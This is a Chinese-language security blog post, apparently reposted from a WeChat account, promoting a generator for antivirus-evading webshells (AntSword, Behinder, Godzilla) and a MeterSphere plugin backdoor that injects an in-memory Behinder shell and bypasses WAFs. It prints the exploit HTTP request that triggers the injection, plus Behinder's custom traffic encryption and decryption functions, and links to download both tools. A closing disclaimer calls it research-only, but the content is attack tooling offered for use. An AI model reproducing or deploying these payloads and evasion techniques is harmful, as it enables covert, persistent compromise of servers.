0x01 工具介绍
shell_Generate
该工具没什么技术含量,学了一点javafx,使用jdk8开发出了几个简单功能用来管理webshell。页面比较LOW。工具整合并改写了各类webshell,支持各个语言的cmd、蚁剑、冰蝎、哥斯拉,又添加了实际中应用到的一些免杀技巧,以方便实际需要。
Sphere-plugin-Backdoor
支持注入内存马和Bypass WAF
下载地址在末尾
0x02 功能简介
Sphere-plugin-Backdoor介绍
命令执行
注入内存马
传入inject编码后的Base64进行注入冰蝎内存马
POST /plugin/customMethod HTTP/1.1Host: localhost:8081Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Connection: closeCookie: MS_SESSION_ID=75407ecc-369b-48a7-ae80-d000f0d1b700Cache-Control: max-age=0Content-Type: application/jsonContent-Length: 65{"entry": "org.metersphere.Evil","request": "aW5qZWN0"}
冰蝎加密函数
private byte[] Encrypt(byte[] data) {byte[] dt = new byte[data.length];for (int i = 0; i < data.length; i++) {dt[i] = (byte) (data[i] + 1);}try {java.io.ByteArrayOutputStream o = new java.io.ByteArrayOutputStream();java.util.zip.GZIPOutputStream g = new java.util.zip.GZIPOutputStream(o);g.write(dt);g.close();byte[] c = o.toByteArray();byte[] ct = new byte[c.length];for (int i = 0; i < c.length; i++) {ct[i] = (byte) (c[i] + 1);}return ct;} catch (Exception ignored) {}return data;}
冰蝎解密函数
private byte[] Decrypt(byte[] data) {byte[] dt = new byte[data.length];for (int i = 0; i < data.length; i++) {dt[i] = (byte) (data[i] - 1);}try {java.io.ByteArrayInputStream t = new java.io.ByteArrayInputStream(dt);java.util.zip.GZIPInputStream i = new java.util.zip.GZIPInputStream(t, dt.length);byte[] c = r(i);byte[] ct = new byte[c.length];for (int b = 0; b < c.length; b++) {ct[b] = (byte) (c[b] - 1);}return ct;} catch (Exception ignored) {}return data;}private byte[] r(java.io.InputStream i) {byte[] temp = new byte[1024];java.io.ByteArrayOutputStream b = new java.io.ByteArrayOutputStream();int n;try {while((n = i.read(temp)) != -1) {b.write(temp, 0, n);}} catch (Exception ignored) {}return b.toByteArray();}
0x03更新介绍
兼容java.util 和 sun.misc 两个包jsp部分将404状态码修改为按钮,默认返回200状态码新增AntSword_jspjs无jsp标签webshell新增asmx_Godzilla_CSHAP_ASMX_AES_BASE64 webshel优化部分免杀代码
0x04 使用介绍
shell_Generate使用介绍
直接下载releases版即可
0x05 下载
注入内马工具:
https://codeload.github.com/wafinfo/MeterSphere-plugin-Backdoor/zip/refs/heads/mainWebshell
免杀生成工具:
https://github.com/cseroad/Webshell_Generate/releases/download/v1.2.2/Webshell_Generate-1.2.2.jar
原文始发于微信公众号(渗透安全HackTwo):一款生成各类免杀webshell及冰蝎插件支持注入内存马绕WAF工具-免杀工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论